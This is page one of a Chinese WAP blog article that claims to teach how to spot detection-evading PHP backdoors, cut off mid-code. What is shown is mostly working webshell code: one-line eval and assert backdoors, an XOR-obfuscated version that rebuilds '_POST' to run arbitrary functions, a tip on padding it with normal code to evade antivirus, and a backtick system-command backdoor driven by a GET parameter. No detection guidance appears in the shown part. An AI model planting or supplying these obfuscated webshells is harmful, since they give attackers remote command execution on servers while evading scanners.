<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE wml PUBLIC "-//WAPFORUM//DTD WML 1.1//EN" "http://www.wapforum.org/DTD/wml_1.1.xml">
<wml>
<head><meta forua="true" http-equiv="Cache-Control" content="max-age=0" /></head>
<card title="如何识别简单的免查杀的PHP后门（带示例讲解）" id="card1">
<p> 游客</p><p>
标题:如何识别简单的免查杀的PHP后门（带示例讲解）<br/>
正文:<br/>
一个最常见的一句话后门可能写作这样&amp;lt;?php @eval($_POST['cmd']);?&amp;gt;或这样&amp;lt;?php @assert($_POST['cmd']);?&amp;gt;tudouya 同学在FREEBUF上给出[一种构造技巧]利用代码如下: &amp;lt;?php  @$_++; // $_ = 1  $__=(&amp;quot;#&amp;quot;^&amp;quot;|&amp;quot;); // $__ = _   $__.=(&amp;quot;.&amp;quot;^&amp;quot;~&amp;quot;); // _P   $__.=(&amp;quot;/&amp;quot;^&amp;quot;`&amp;quot;); // _PO   $__.=(&amp;quot;|&amp;quot;^&amp;quot;/&amp;quot;); // _POS   $__.=(&amp;quot;{&amp;quot;^&amp;quot;/&amp;quot;); // _POST   ${$__}[!$_](${$__}[$_]); // $_POST[0]($_POST[1]);  ?&amp;gt;构造生成,当然,嫌太直观可以写作这样代码如下: &amp;lt;?php @$_++;$__=(&amp;quot;#&amp;quot;^&amp;quot;|&amp;quot;).(&amp;quot;.&amp;quot;^&amp;quot;~&amp;quot;).(&amp;quot;/&amp;quot;^&amp;quot;`&amp;quot;).(&amp;quot;|&amp;quot;^&amp;quot;/&amp;quot;).(&amp;quot;{&amp;quot;^&amp;quot;/&amp;quot;);@${$__}[!$_](${$__}[$_]);?&amp;gt;然后再填充些普通代码进行伪装,一个简单的&amp;rdquo;免杀&amp;rdquo;shell样本就出现了我们再来看看号称史上最简单免查杀php后门直接上代码：&amp;lt;?php $c=urldecode($_GET['c']);if($c){`$c`;}//完整 !$_GET['c']||`{$_GET['c']}`;//精简 /******************************************************* * 原理：PHP中``符号包含会当作系统命令执行 * 示例：http://host/?c=type%20c<br/><a href="http://camnpr.com/wap.asp?mode=WAP&amp;act=View&amp;id=2185&amp;Page=1">[&lt;&lt;]</a><a href="http://camnpr.com/wap.asp?mode=WAP&amp;act=View&amp;id=2185&amp;Page=1">[[1]]</a><a href="http://camnpr.com/wap.asp?mode=WAP&amp;act=View&amp;id=2185&amp;Page=2">[2]</a><a href="http://camnpr.com/wap.asp?mode=WAP&amp;act=View&amp;id=2185&amp;Page=3">[3]</a><a href="http://camnpr.com/wap.asp?mode=WAP&amp;act=View&amp;id=2185&amp;Page=5">[&gt;&gt;]</a><br/>
<br/>
<a href="wap.asp?act=Com&amp;id=2185">查看评论(0)</a><br/>
<a href="wap.asp?act=AddCom&amp;inpId=2185">发表评论</a><br/><br/>

<br/>

<br/>
<a href="http://camnpr.com/wap.asp">首页</a>
</p>
</card>
</wml>